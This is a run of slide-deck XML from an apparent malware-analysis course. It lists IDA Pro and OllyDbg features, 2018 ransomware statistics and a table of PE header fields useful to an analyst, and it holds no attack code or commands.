            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Format operands: hex, dec, etc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Using Name constant: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Redefining code and data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1409" name="Google Shape;1409;p154"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876256" y="0"/>
            <a:ext cx="2243473" cy="110434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155"/>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IDA Pro</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1415" name="Google Shape;1415;p155"/>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Plug-in</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>IDC script</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Python script</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1416" name="Google Shape;1416;p155"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876256" y="0"/>
            <a:ext cx="2243473" cy="110434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156"/>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OllyDbg</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423" name="Google Shape;1423;p156"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="OllyDbg" id="1424" name="Google Shape;1424;p156"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657128" y="87318"/>
            <a:ext cx="1050776" cy="1032010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1425" name="Google Shape;1425;p156"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="48254" y="1109682"/>
            <a:ext cx="9032092" cy="5748318"/>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157"/>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OllyDbg</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1432" name="Google Shape;1432;p157"/>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GB"/>
              <a:t>Loading Malware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Memory map</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Viewing threads and stacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Executing code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Breakpoints</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Loading DLL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tracing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Exception handling</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Patching</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Analyzing shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Assistance features</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Plug-ins</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-180975" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-180975" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-99060" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="OllyDbg" id="1433" name="Google Shape;1433;p157"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657128" y="87318"/>
            <a:ext cx="1050776" cy="103201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6"/>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Security reports</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Google Shape;203;p16"/>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Crypto-ransomware</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>2018: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400"/>
              <a:t>765 538 unique users attacked by encryptors</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="204" name="Google Shape;204;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331642" y="2791134"/>
            <a:ext cx="6480718" cy="331066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7"/>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Security reports</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Google Shape;210;p17"/>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Local infection </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="211" name="Google Shape;211;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3203848" y="1201593"/>
            <a:ext cx="5749225" cy="54594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8"/>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PE Headers and Sections</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217;p18"/>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The PE header contains useful information for the malware analyst including</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="218" name="Google Shape;218;p18"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="658888" y="2420888"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{D86BE483-798B-4F8A-A1FD-F16CD49BAE18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2647800"/>
                <a:gridCol w="5081725"/>
              </a:tblGrid>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800" u="none" cap="none" strike="noStrike"/>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Information revealed</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Imports</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Functions from other lib. used by the malware</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Exports</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Functions in the malware called by others</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Time Date</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t> Stamp</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Time complied</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Sections</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Names</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t> of sections in the file and their sizes on the disk and memory</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Subsystem</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Indicates whether the program is</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t> a command-line or GUI app.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Resource</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Strings,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t> icons, menus and others included.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>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9"/>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225" name="Google Shape;225;p19"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="226" name="Google Shape;226;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="55669" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555777" y="1268760"/>
            <a:ext cx="4316226" cy="546601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2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5004048" y="1124744"/>
            <a:ext cx="4139952" cy="3104964"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Google Shape;96;p2"/>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Bio</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Google Shape;97;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="1196752"/>
            <a:ext cx="8784976" cy="5544616"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
